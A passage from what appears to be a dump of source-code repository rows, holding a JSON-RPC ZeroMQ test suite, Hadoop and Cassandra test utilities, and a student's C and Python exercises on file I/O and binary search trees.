Modified on April 1 2019.\n@author: zheng zhang and louis felix nothias\n@purpose: to convert the XCMS-(CAMERA)-(IIN) output into a desirable format for FBMN or FBMNxIIN\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport sys\n\ndef convert_to_feature_csv(input_filename, output_filename):\n    #Check and convert for XCMS or XCMS-CAMERA for FBMN\n\n    input_format_df = pd.read_csv(input_filename,index_col=None,sep='\\t')\n\n    if 'annotation network number' not in input_format_df.columns:\n        #Prepare left table with ID mz rt\n        input_format_df = input_format_df.rename(columns={ \"Row.names\":\"row ID\", \"mzmed\":\"row m/z\",\"rtmed\":\"row retention time\"})\n\n        table_part_left = input_format_df[['row ID', 'row m/z','row retention time']]\n\n        #Prepare right table with ms filename\n        list_data_filename = list(input_format_df.filter(regex='.mzML|.mzXML|.mzml|.mzxml|.raw|.cdf|.CDF|.mzData|.netCDF|.netcdf|.mzdata'))\n        table_part_right = input_format_df[list_data_filename]\n\n        ## Add Peak area\n        for i in range(0,len(table_part_right.columns.values)):\n            table_part_right.columns.values[i] += \" Peak area\"\n        ## Do some table processing\n        table_part_right = table_part_right.fillna(value=0)\n        ##Remove the FT string from the first column\n        new_column = table_part_left['row ID'].to_list()\n        new_column = [w.replace('FT', '') for w in new_column]\n        table_part_left_copy = pd.DataFrame(np.array([new_column]).T)\n        table_part_left_copy.columns = ['row ID']\n        table_part_left_copy['row ID'] = new_column\n        table_part_left_copy[['row ID']] = table_part_left_copy[['row ID']].apply(pd.to_numeric)\n        table_part_left = table_part_left.drop(['row ID'], axis=1)\n        table_part_left_processed = pd.concat([table_part_left_copy, table_part_left], axis=1, join='inner')\n\n        ## Join back the tables\n        output_format = pd.concat([table_part_left_processed, table_part_right], axis=1, join='inner')\n        output_format.to_csv(output_filename,index = False)\n\n    #Check and convert for XCMS-CAMERA for IINxFBMN\n    elif 'annotation network number' in input_format_df.columns:\n        input_format_df = input_format_df.rename(columns={\"mzmed\":\"row m/z\", \"rtmed\":\"row retention time\"})\n\n        table_part_left = input_format_df[['row ID', 'row m/z','row retention time','correlation group ID',\\\n        'annotation network number','best ion','auto MS2 verify','identified by n=',\\\n        'partners','neutral M mass']]\n\n        #Prepare right table with ms filename\n        list_data_filename = list(input_format_df.filter(regex='.mzML|.mzXML|.mzml|.mzxml|.raw|.RAW|.cdf|.CDF|.mzData|.netCDF|.netcdf|.mzdata'))\n        table_part_right = input_format_df[list_data_filename]\n\n        ## Add Peak area\n        for i in range(0,len(table_part_right.columns.values)):\n            table_part_right.columns.values[i] += \" Peak area\"\n        # ## Do some table processing\n        table_part_right = table_part_right.fillna(value=0)\n\n        # ## Join back the tables\n        output_format = pd.concat([table_part_left, table_part_right], axis=1, join='inner')\n        output_format.to_csv(output_filename,index = False)\n\n    else:\n        print('Feature quantification table format is incorrect. Verify the input table or the option selection. 
Please provide an XCMS table for FBMN or an XCMS-CAMERA table for FBMNxIIN.')\n\nif __name__==\"__main__\":\n    # there should be only one input file\n    convert_to_feature_csv(sys.argv[1],sys.argv[2])\n" }, { "alpha_fraction": 0.8245614171028137, "alphanum_fraction": 0.8421052694320679, "avg_line_length": 27.33333396911621, "blob_id": "672518498401650e4d18e5fa095c8af09b62af95", "content_id": "dd6f7640c9612399866b6a127c762d6203f8503a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 171, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/molecular-librarysearch-v2/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=molecular-librarysearch-v2\nTOOL_FOLDER_NAME=molecularsearch\nWORKFLOW_VERSION=release_14\n\n" }, { "alpha_fraction": 0.6569613814353943, "alphanum_fraction": 0.6596082448959351, "avg_line_length": 43.2734375, "blob_id": "85834f172b9b31bd4203d286299e82c1139eef69", "content_id": "118b47cc1367b46300a729a4f8ad3603cdb8e72d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5667, "license_type": "no_license", "max_line_length": 162, "num_lines": 128, "path": "/feature-based-molecular-networking/tools/feature-based-molecular-networking/scripts/run_qiime2.py", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport os\nimport sys\nimport requests\nimport shutil\nimport argparse\n\ndef main():\n    parser = argparse.ArgumentParser(description='')\n    parser.add_argument('input_metadata_filename', help='input_metadata_filename')\n    parser.add_argument('input_quantification_table', help='input_quantification_table')\n    parser.add_argument('output_folder', help='output_folder')\n    parser.add_argument(\"conda_activate_bin\")\n    parser.add_argument(\"conda_environment\")\n    args = parser.parse_args()\n\n    output_metadata_filename = os.path.join(args.output_folder, \"qiime2_metadata.tsv\")\n    output_manifest_filename = os.path.join(args.output_folder, \"qiime2_manifest.tsv\")\n\n    df_quantification = pd.read_csv(args.input_quantification_table, sep=\",\")\n\n    \"\"\"Reading Metadata Filename and filling in empty entries\"\"\"\n    if len(args.input_metadata_filename) > 2:\n        df_metadata = pd.read_csv(args.input_metadata_filename, sep=\"\\t\")\n    else:\n        df_metadata = pd.DataFrame([{\"filename\": \"placeholder\"}])\n\n    if not \"sample_name\" in df_metadata:\n        df_metadata[\"sample_name\"] = df_metadata[\"filename\"]\n\n    \"\"\"Checking if the set of filenames is fully covered; if not, we'll provide a placeholder\"\"\"\n    all_quantification_filenames = [key.replace(\"Peak area\", \"\").rstrip() for key in df_quantification.keys() if \"Peak area\" in key]\n    metadata_filenames = []\n    try:\n        metadata_filenames = list(df_metadata[\"filename\"])\n    except:\n        pass\n\n    metadata_object_list = df_metadata.to_dict(orient=\"records\")\n    for quantification_filename in all_quantification_filenames:\n        if not quantification_filename in metadata_filenames:\n            print(quantification_filename, \"not found\")\n            metadata_object = {}\n            metadata_object[\"filename\"] = quantification_filename\n            metadata_object[\"sample_name\"] = quantification_filename\n            metadata_object_list.append(metadata_object)\n\n    \"\"\"Adding in missing filenames into the metadata\"\"\"\n    new_output_metadata = 
pd.DataFrame(metadata_object_list)\n\n #Removing protected headers\n new_output_metadata = new_output_metadata.drop(columns=[\"feature\", \"#SampleID\"], errors=\"ignore\")\n\n output_columns = list(new_output_metadata.keys())\n output_columns.remove(\"sample_name\")\n output_columns.insert(0, \"sample_name\")\n\n new_output_metadata.to_csv(output_metadata_filename, index=False, sep=\"\\t\", columns=output_columns, na_rep=\"NaN\")\n\n \"\"\"Outputting Manifest Filename\"\"\"\n manifest_df = pd.DataFrame()\n manifest_df[\"sample_name\"] = new_output_metadata[\"sample_name\"]\n manifest_df[\"filepath\"] = new_output_metadata[\"filename\"]\n manifest_df.to_csv(output_manifest_filename, index=False, sep=\",\")\n\n #Running Qiime2\n local_qza_table = os.path.join(args.output_folder, \"qiime2_table.qza\")\n local_qza_relative_table = os.path.join(args.output_folder, \"qiime2_relative_table.qza\")\n local_qza_distance = os.path.join(args.output_folder, \"qiime2_distance.qza\")\n local_qza_pcoa = os.path.join(args.output_folder, \"qiime2_pcoa.qza\")\n local_qzv_emperor = os.path.join(args.output_folder, \"qiime2_emperor.qzv\")\n local_qza_biplot = os.path.join(args.output_folder, \"qiime2_biplot.qza\")\n local_qzv_biplot_emperor = os.path.join(args.output_folder, \"qiime2_biplot_emperor.qzv\")\n\n\n all_cmd = []\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime metabolomics import-mzmine2 \\\n --p-manifest {} \\\n --p-quantificationtable {} \\\n --o-feature-table {}\".format(args.conda_activate_bin, args.conda_environment, output_manifest_filename, args.input_quantification_table, local_qza_table))\n\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime diversity beta \\\n --i-table {} \\\n --p-metric cosine \\\n --o-distance-matrix {}\".format(args.conda_activate_bin, args.conda_environment, local_qza_table, local_qza_distance))\n\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime diversity pcoa \\\n --i-distance-matrix {} \\\n --o-pcoa {}\".format(args.conda_activate_bin, args.conda_environment, local_qza_distance, local_qza_pcoa))\n\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime emperor plot \\\n --i-pcoa {} \\\n --m-metadata-file {} \\\n --o-visualization {} \\\n --p-ignore-missing-samples\".format(args.conda_activate_bin, args.conda_environment, local_qza_pcoa, output_metadata_filename, local_qzv_emperor))\n\n #Biplotting\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime feature-table relative-frequency \\\n --i-table {} \\\n --o-relative-frequency-table {}\".format(args.conda_activate_bin, args.conda_environment, local_qza_table, local_qza_relative_table))\n\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime diversity pcoa-biplot \\\n --i-pcoa {} \\\n --i-features {} \\\n --o-biplot {}\".format(args.conda_activate_bin, args.conda_environment, local_qza_pcoa, local_qza_relative_table, local_qza_biplot))\n\n all_cmd.append(\"LC_ALL=en_US && export LC_ALL && source {} {} && \\\n qiime emperor biplot \\\n --i-biplot {} \\\n --m-sample-metadata-file {} \\\n --p-number-of-features 10 \\\n --o-visualization {} \\\n --p-ignore-missing-samples\".format(args.conda_activate_bin, args.conda_environment, local_qza_biplot, output_metadata_filename, local_qzv_biplot_emperor))\n\n\n for cmd in all_cmd:\n os.system(cmd)\n\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.8375634551048279, "alphanum_fraction": 
0.8477157354354858, "avg_line_length": 31.83333396911621, "blob_id": "9e43c51fd9efe42c648354d8624f39e4c038efc3", "content_id": "b5f71d29628a48138628bcf78ff70edb49df8e4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 197, "license_type": "no_license", "max_line_length": 51, "num_lines": 6, "path": "/feature-based-molecular-networking/Makefile", "repo_name": "madeleineernst/GNPS_Workflows", "src_encoding": "UTF-8", "text": "include ../Makefile.credentials\ninclude ../Makefile.deploytemplate\n\nWORKFLOW_NAME=feature-based-molecular-networking\nTOOL_FOLDER_NAME=feature-based-molecular-networking\nWORKFLOW_VERSION=release_14\n" } ]
18
pjkundert/jsonrpc2-zeromq-python
https://github.com/pjkundert/jsonrpc2-zeromq-python
b055fe11b7f8eeab419a7871450b8b993c27a0d9
31099d2320e6c84f9ab71b7ea43747682711ac72
e06884e1a2e46395ddb284c3ced372cf46eed743
refs/heads/master
2021-01-15T15:57:59.940867
2012-01-14T01:51:15
2012-01-14T01:51:15
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6215681433677673, "alphanum_fraction": 0.6282463669776917, "avg_line_length": 30.092308044433594, "blob_id": "3080af563f7709481c2cbda67a2e877788cab5cc", "content_id": "b8c888da498d217527e1e82aa8bf3e017213daf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4043, "license_type": "no_license", "max_line_length": 81, "num_lines": 130, "path": "/jsonrpc2_zeromq/test/test_server.py", "repo_name": "pjkundert/jsonrpc2-zeromq-python", "src_encoding": "UTF-8", "text": "# Part of the jsonrpc2-zeromq-python project.\n# (c) 2012 Wireless Innovation Ltd, All Rights Reserved.\n# Please see the LICENSE file in the root of this project for license\n# information.\n\nimport unittest\nimport logging\nfrom time import sleep\n\nimport zmq\n\nimport jsonrpc2_zeromq\n\n\nclass RPCTestServer(jsonrpc2_zeromq.RPCServer):\n\n def handle_echo_method(self, msg):\n return msg\n\n def handle_dict_args_method(self, an_int=None, a_bool=None, a_float=None,\n a_str=None):\n return dict(an_int=an_int, a_bool=a_bool, a_float=a_float, a_str=a_str)\n\n\nclass RPCNotificationTestServer(jsonrpc2_zeromq.RPCNotificationServer):\n\n def handle_echo_method(self, msg):\n return msg\n\n\nclass NotificationOnlyPullTestServer(jsonrpc2_zeromq.NotificationOnlyPullServer):\n\n def handle_event_method(self, event_type, event_value):\n # Do things!\n pass\n\n\ntest_debug_logger = logging.getLogger('jsonrpc2_zeromq_test')\ntest_debug_logger.setLevel(logging.DEBUG)\nlogger_console_handler = logging.StreamHandler()\nlogger_console_handler.setLevel(logging.DEBUG)\ntest_debug_logger.addHandler(logger_console_handler)\n\n\nclass BaseServerTestCase(unittest.TestCase):\n\n endpoint = \"inproc://jsonrpc2-zeromq-tests\"\n logger = None\n\n def tearDown(self):\n self.server.stop()\n self.server.join()\n self.server.close()\n sleep(0.1) # Wait for socket to actually close\n\n\nclass RPCServerTestCase(BaseServerTestCase):\n\n def setUp(self):\n self.server = RPCTestServer(endpoint=self.endpoint,\n logger=self.logger)\n self.server.daemon = True\n self.server.start()\n self.client = jsonrpc2_zeromq.RPCClient(endpoint=self.endpoint,\n logger=self.logger)\n\n def test_echo(self):\n msg = \"Test message\"\n result = self.client.echo(msg)\n self.assertEqual(msg, result)\n\n def test_many(self):\n msgs = [\"test lots\", \"and another\", \"me too\"]\n for i, msg in enumerate(msgs):\n result = self.client.echo(msg)\n self.assertEqual(msgs[i], result)\n\n def test_dict_args(self):\n dict_out = dict(an_int=1, a_bool=True, a_float=1.5556, a_str=\"hello!\")\n result = self.client.dict_args(**dict_out)\n self.assertEqual(dict_out, result)\n\n def test_method_not_found(self):\n try:\n self.client.non_existent_method()\n except jsonrpc2_zeromq.MethodNotFound:\n pass\n else:\n self.fail(\"Non-existent method allowed\")\n\n\nclass RPCNotificationServerTestCase(BaseServerTestCase):\n\n def setUp(self):\n self.server = RPCNotificationTestServer(endpoint=self.endpoint,\n logger=self.logger)\n self.server.daemon = True\n self.server.start()\n self.client = jsonrpc2_zeromq.RPCNotifierClient(endpoint=self.endpoint,\n logger=self.logger)\n\n def test_rpc(self, msg=\"clowns and monkeys\"):\n result = self.client.echo(msg)\n self.assertEqual(msg, result)\n\n def test_notify(self):\n self.client.notify.echo(\"a message into the void\")\n\n def test_notify_then_rpc(self):\n self.test_notify()\n self.test_rpc()\n self.test_rpc(\"and lions and tigers\")\n\n\nclass 
NotificationOnlyPullServerTestCase(BaseServerTestCase):\n\n def setUp(self):\n self.server = NotificationOnlyPullTestServer(endpoint=self.endpoint,\n logger=self.logger)\n self.server.daemon = True\n self.server.start()\n self.client = jsonrpc2_zeromq.NotifierOnlyPushClient(\n endpoint=self.endpoint, logger=self.logger)\n\n def test_event(self):\n self.client.notify.event(\"fell over\", \"quickly\")\n\n def test_many_events(self):\n for i in xrange(100):\n self.client.notify.event(\"balloon launched\", \"number {0}\".format(i))\n\n" } ]
1
tubular/aegisthus
https://github.com/tubular/aegisthus
13aaefdbf2dfead1eb1ffb5dc71ff7ac179a13b2
859f6a10eb5127545ea1ea74ffdba2e7ce1e9dc2
905e8991104721dc7d5c08bc9a37fcf184280275
refs/heads/master
2021-05-30T08:42:11.354392
2016-01-15T22:16:01
2016-01-15T22:16:01
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7214891314506531, "alphanum_fraction": 0.7224316596984863, "avg_line_length": 36.89285659790039, "blob_id": "3dc9c9d88e630a186b8abbd2dc48f95dbb215d03", "content_id": "0873be9c21f5922689ba830709ef23da2f1f07f4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2122, "license_type": "permissive", "max_line_length": 147, "num_lines": 56, "path": "/aegisthus-hadoop/src/main/java/com/netflix/aegisthus/input/splits/AegCompressedSplit.java", "repo_name": "tubular/aegisthus", "src_encoding": "UTF-8", "text": "package com.netflix.aegisthus.input.splits;\n\nimport com.netflix.aegisthus.io.sstable.compression.CompressionInputStream;\nimport com.netflix.aegisthus.io.sstable.compression.CompressionMetadata;\nimport org.apache.hadoop.conf.Configuration;\nimport org.apache.hadoop.fs.FSDataInputStream;\nimport org.apache.hadoop.fs.FileSystem;\nimport org.apache.hadoop.fs.Path;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.annotation.Nonnull;\nimport java.io.DataInput;\nimport java.io.DataOutput;\nimport java.io.IOException;\nimport java.io.InputStream;\n\npublic class AegCompressedSplit extends AegSplit {\n private static final Logger LOG = LoggerFactory.getLogger(AegCompressedSplit.class);\n protected long dataLength; // Size of decompressed data in bytes\n\n public static AegCompressedSplit createAegCompressedSplit(@Nonnull Path path, long start, long end, long dataLength, @Nonnull String[] hosts) {\n LOG.info(\"Split start: {}, end: {}, Total data size: {}\", start, end, dataLength);\n\n AegCompressedSplit split = new AegCompressedSplit();\n split.path = path;\n split.start = start;\n split.end = end;\n split.hosts = hosts;\n split.dataLength = dataLength;\n return split;\n }\n\n @Nonnull\n @Override\n public InputStream getInput(@Nonnull Configuration conf) throws IOException {\n FileSystem fs = path.getFileSystem(conf);\n FSDataInputStream dataIn = fs.open(path);\n Path metadataPath = new Path(path.getParent(), path.getName().replaceAll(\"-Data.db\", \"-CompressionInfo.db\"));\n FSDataInputStream metadataIn = fs.open(metadataPath);\n CompressionMetadata metadata = new CompressionMetadata(metadataIn, start, end, dataLength);\n return new CompressionInputStream(dataIn, metadata);\n }\n\n @Override\n public void write(@Nonnull DataOutput out) throws IOException {\n super.write(out);\n out.writeLong(dataLength);\n }\n\n @Override\n public void readFields(@Nonnull DataInput in) throws IOException {\n super.readFields(in);\n this.dataLength = in.readLong();\n }\n}\n" }, { "alpha_fraction": 0.5015416145324707, "alphanum_fraction": 0.6022610664367676, "avg_line_length": 45.33333206176758, "blob_id": "4be26afb8bf040fd8c8dadade865cea1c9350bb5", "content_id": "9261fac5379bdd3f2ea601acd203d3232f0ba4a0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 973, "license_type": "permissive", "max_line_length": 151, "num_lines": 21, "path": "/testing/data_generator.py", "repo_name": "tubular/aegisthus", "src_encoding": "UTF-8", "text": "import cqlsl\nfrom cqlsl.sessions import Session\nfrom cqlsl.statements import insert\nfrom cassandra.cluster import Cluster\nfrom datetime import datetime\n\n\ncluster = Cluster(['127.0.0.1'])\nsession = Session(cluster, keyspace='test')\n\nfields = ('bigint_field', 'boolean_field', 'float_field', 'int_field', 'list_int_field', 'set_text_field', 'map_time_field', 'map_long_field')\ndata = [\n (1, 
False, 1.32, 54, [1,2], {'a', 'b'}, {'first': datetime(2014, 1, 1, 2, 45), 'second': datetime(2015, 1, 2, 3)}, {'views': long(2.2 * 10 ** 9)}),\n (2, True, 0.4312, 22, None, {'c', 'd'}, {'first': datetime(2014, 2, 1, 2, 45)}, {'views': long(2.5 * 10 ** 9)}),\n (3, True, None, 5123, None, {'a', 'b', 'c'}, None, {'likes': 21}),\n (4, False, 23432.123, 5113, list(), set(), dict(), {'likes': 123123}),\n (5, None, 232.123, 5113, None, None, None, {'shares': 5 * 10 ** 9}),\n]\n\nfor values in data:\n session.execute(insert('test_table').values(**dict(zip(fields, values))))\n" }, { "alpha_fraction": 0.6644295454025269, "alphanum_fraction": 0.6644295454025269, "avg_line_length": 26.090909957885742, "blob_id": "d88ca684a9d8093bea0df176942b453e88914f5e", "content_id": "aa5e50a5c42345f5c6509487d245de33caaa3e7c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 298, "license_type": "permissive", "max_line_length": 39, "num_lines": 11, "path": "/testing/schema.cql", "repo_name": "tubular/aegisthus", "src_encoding": "UTF-8", "text": "CREATE TABLE test.test_table (\n bigint_field bigint,\n boolean_field boolean,\n float_field float,\n int_field int,\n list_int_field list<int>,\n set_text_field set<text>,\n map_time_field map<text,timestamp>,\n map_long_field map<text,bigint>,\n PRIMARY KEY ((bigint_field))\n);\n" } ]
3
eliotjang/File_Processing
https://github.com/eliotjang/File_Processing
29aa067ccd1563da182e1347a4be7953782343c1
508d9c58242fd9c19d4fbb638ec98a35fa936512
db22613b89083744f98370aa8049066c4fa80747
refs/heads/master
2020-08-20T19:03:37.989980
2020-07-21T04:31:06
2020-07-21T04:31:06
216,056,816
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.5061224699020386, "avg_line_length": 14.333333015441895, "blob_id": "0465e06247c2e38a6917646f76b01e8af166a1f8", "content_id": "6c62bbe14f6be2f2d914353ac45b53a4a58f9092", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 789, "license_type": "no_license", "max_line_length": 72, "num_lines": 48, "path": "/eliotjang_project/FileProcessing_chapter4/FileProcessing/create_file.cpp", "repo_name": "eliotjang/File_Processing", "src_encoding": "UHC", "text": "#include <stdio.h>\n#include <string.h>\n\nstruct member {\n\tchar name[10];\n\tint age;\n\tchar sex[3];\n\tchar city[10];\n};\n\nint main()\n{\n\tstruct member m[3];\n\tint i;\n\n\tFILE* f;\n\n\tstrcpy(m[0].name, \"장성원\");\n\tm[0].age = 22;\n\tstrcpy(m[0].sex, \"남\");\n\tstrcpy(m[0].city, \"서울\");\n\n\tstrcpy(m[1].name, \"윤수현\");\n\tm[1].age = 24;\n\tstrcpy(m[1].sex, \"남\");\n\tstrcpy(m[1].city, \"고성\");\n\n\tstrcpy(m[2].name, \"장성혁\");\n\tm[2].age = 24;\n\tstrcpy(m[2].sex, \"남\");\n\tstrcpy(m[2].city, \"서울\");\n\n\tprintf(\"구조체에 입력된 자료\\n\");\n\n\tfor (i = 0; i < 3; i++) {\n\t\tprintf(\"%s %d %s %s\\n\", m[i].name, m[i].age, m[i].sex, m[i].city);\n\t}\n\n\tf = fopen(\"a.txt\", \"w\");\n\n\tfor (i = 0; i < 3; i++) {\n\t\tfprintf(f, \"%s %d %s %s\\n\", m[i].name, m[i].age, m[i].sex, m[i].city);\n\t}\n\n\tfclose(f);\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.5564202070236206, "alphanum_fraction": 0.5836575627326965, "avg_line_length": 14.606060981750488, "blob_id": "7287ac86205fed2bb6d73b2830600777ddf2ae80", "content_id": "230c457eefef8678146153a0e9cef472d6ebddf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 514, "license_type": "no_license", "max_line_length": 40, "num_lines": 33, "path": "/eliotjang_project/FileProcessing_chapter4/FileProcessing/fgetc.c", "repo_name": "eliotjang/File_Processing", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h> // For exit()\n\nint main()\n{\n\tFILE* fptr1, * fptr2;\n\tchar c;\n\n\tfptr1 = fopen(\"src.txt\", \"r\");\n\tif (fptr1 == NULL) {\n\t\tprintf(\"Cannot open file src.txt\\n\");\n\t\texit(0);\n\t}\n\n\tfptr2 = fopen(\"des.txt\", \"w\");\n\tif (fptr2 == NULL) {\n\t\tprintf(\"Cannot open file des.txt\\n\");\n\t\texit(0);\n\t}\n\n\t// Read contents from file\n\tc = fgetc(fptr1);\n\twhile (c != EOF) {\n\t\tfputc(c, fptr2);\n\t\tc = fgetc(fptr1);\n\t}\n\n\tprintf(\"\\nContents copied to des.txt\");\n\n\tfclose(fptr1);\n\tfclose(fptr2);\n\treturn 0;\n}" }, { "alpha_fraction": 0.5990220308303833, "alphanum_fraction": 0.621026873588562, "avg_line_length": 15.399999618530273, "blob_id": "553038acdf826d372ee7d4dedc066313a1a61ae5", "content_id": "80ade26f88bef0617b9b22bd492eab20a1ba6a86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 409, "license_type": "no_license", "max_line_length": 45, "num_lines": 25, "path": "/eliotjang_project/FileProcessing_chapter4/FileProcessing/fputc_v2.c", "repo_name": "eliotjang/File_Processing", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main()\n{\n\tint i = 0;\n\tFILE* streamfile = fopen(\"stream.txt\", \"w\");\n\n\tif (streamfile == NULL)\n\t\treturn 0;\n\n\tchar string[] = \"SMITH\", outputString[20];\n\n\tfor (i = 0; string[i] != '\\0'; i++)\n\t\tfputc(string[i], streamfile);\n\n\tfclose(streamfile);\n\tstreamfile = fopen(\"stream.txt\", \"r\");\n\n\tfgets(outputString, 20, streamfile);\n\n\tprintf(\"%s\", 
outputString);\n\n\tfclose(streamfile);\n\treturn 0;\n}" }, { "alpha_fraction": 0.6477272510528564, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 9.731707572937012, "blob_id": "3192c9c58caab3b98975b3cbc305390fb462ec28", "content_id": "596e38437db92582b81d65792e1b8a9081cc1d7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 646, "license_type": "no_license", "max_line_length": 47, "num_lines": 41, "path": "/README.md", "repo_name": "eliotjang/File_Processing", "src_encoding": "UTF-8", "text": "# File Processing (파일처리론)\n\nNotes on what I learned while taking **File Processing**, a second-year Computer Engineering course.\n\n## Languages Used\n\n- C\n- Python\n\n## Contents\n\n- Basic concepts of files\n- File storage devices\n- File I/O control\n- Sequential files\n- Index structures\n- Indexed sequential files\n- Direct files\n- Multi-key files\n- Files for text\n" }, { "alpha_fraction": 0.4590570628643036, "alphanum_fraction": 0.4863523542881012, "avg_line_length": 14.428571701049805, "blob_id": "ed8b254f65510bc96c7709b0edcd4265217c9314", "content_id": "06b3631ccc79b22ddee80a1b445b9d1304f6c65d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 403, "license_type": "no_license", "max_line_length": 70, "num_lines": 28, "path": "/eliotjang_project/FileProcessing_chapter4/FileProcessing/read_file.c", "repo_name": "eliotjang/File_Processing", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nstruct member {\n\tchar name[10];\n\tint age;\n\tchar sex[3];\n\tchar city[10];\n};\n\nint main()\n{\n\tstruct member m[3];\n\tint i;\n\tFILE* f;\n\n\tf = fopen(\"a.txt\", \"r\");\n\n\tfor (i = 0; i < 3; i++) {\n\t\tfscanf(f, \"%s %d %s %s\", m[i].name, &m[i].age, m[i].sex, m[i].city);\n\t}\n\tfclose(f);\n\t\n\tfor (i = 0; i < 3; i++) {\n\t\tprintf(\"%s %d %s %s\\n\", m[i].name, m[i].age, m[i].sex, m[i].city);\n\t}\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.5639204382896423, "alphanum_fraction": 0.5707386136054993, "avg_line_length": 33.861385345458984, "blob_id": "73427e51090092327ce071691233ef0fe0662419", "content_id": "4755d3a573d956a153110373ab80edc2f9d8a307", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4768, "license_type": "no_license", "max_line_length": 102, "num_lines": 101, "path": "/Assignment/for BST/BinarySearchTreeV2.py", "repo_name": "eliotjang/File_Processing", "src_encoding": "UTF-8", "text": "'''\nAuthor: Eliot Jang(장성원)\nlast_modified_at: 2019-11-11\n'''\n\n# Node class: stores the given data in the instance and initializes the left/right child pointers\nclass Node(object):\n    def __init__(self, data):\n        self.data = data\n        self.left = self.right = None\n\n# Binary search tree class\nclass BinarySearchTree(object):\n    # Initialize the root node of the instance\n    def __init__(self):\n        self.root = None\n    # Insert the given data starting from the root of the BST\n    def insert(self, data):\n        self.root = self._insert_value(self.root, data)\n        # Return True if the root node holds a value\n        return self.root is not None\n\n    def _insert_value(self, node, data):\n        # If this node is empty, store the data in a new Node instance\n        if node is None:\n            node = Node(data)\n        else:\n            # If the given data is less than or equal to this node's data\n            if data <= node.data:\n                # Recurse into the left subtree with node.left and the data\n                node.left = self._insert_value(node.left, data)\n            else:\n                # Recurse into the right subtree with node.right and the data\n                node.right = self._insert_value(node.right, data)\n        # Return the (possibly newly created) node instance\n        return node\n    # find method: takes the key to search for and the result array\n    def find(self, key, result):\n        # Delegate to the helper that locates the data, and return its result\n        return self._find_value(self.root, key, result)\n    # _find_value: takes the current node, the key, and the result array\n    def _find_value(self, root, key, result):\n        # If the search falls off the tree, the key is not in the array\n        if root is None:\n            print(\"\\nThe data is not in the array\\nReturned index: \", end='')\n            return -1\n        # If this node's data matches the key\n        if root.data == key:\n            # Print the found data\n            print(\"\\nThe data in the array is\", root.data, \"\\nThe array index of the data is \", end='')\n            # Return the array index of the data (printed by the caller)\n            return result.index(root.data)\n        # If the key is smaller than this node's data\n        elif key < root.data:\n            # Recurse into the left subtree with the key and the result array\n            return self._find_value(root.left, key, result)\n        else:\n            # Recurse into the right subtree with the key and the result array\n            return self._find_value(root.right, key, result)\n    # In-order traversal: visit the whole left subtree, then the node, then the whole right subtree, giving ascending order\n    def in_order_traversal(self, result):\n        # Implementation of the in-order traversal\n        def _in_order_traversal(root, result):\n            # If the node is None\n            if root is None:\n                # nothing to do\n                pass\n            else:\n                # Otherwise visit the left subtree first\n                _in_order_traversal(root.left, result)\n                # Append the data to the result array\n                result.append(root.data)\n                # Print the array index and the data value\n                print('[', array.index(root.data), ']', root.data)\n                # Then visit the right subtree\n                _in_order_traversal(root.right, result)\n        # Start the traversal from the root node\n        _in_order_traversal(self.root, result)\n\nif __name__ == '__main__':\n    # Initial data values\n    array = [15, 11, 70, 5, 13, 50, 18, 30, 1]\n    # Initialize the array that will hold the final result\n    result = []\n\n    print(\"Initial array\")\n    print(array)\n    # Build the binary search tree\n    bst = BinarySearchTree()\n    # Insert the data values into the binary search tree\n    for x in array:\n        bst.insert(x)\n\n    print(\"\\nHow the initial array gets sorted by the binary search tree\")\n    bst.in_order_traversal(result)\n\n    print(\"\\nNew array after applying the binary search tree\")\n    print(result)\n    for a in result:\n        print('[', result.index(a), ']', a)\n\n    while True:\n        x = input(\"\\nEnter the data to search for\")\n        int_x = int(x)\n        print(bst.find(int_x, result))" }, { "alpha_fraction": 0.5235294103622437, "alphanum_fraction": 0.550000011920929, "avg_line_length": 16.947368621826172, "blob_id": "e9eeb688218dbc8fb24ac16433530de98ecb2ed6", "content_id": "aaeb3c07cb1f0cdd8d36d6418c09317f88d4d0c4", "detected_licenses": [], "is_generated": false, 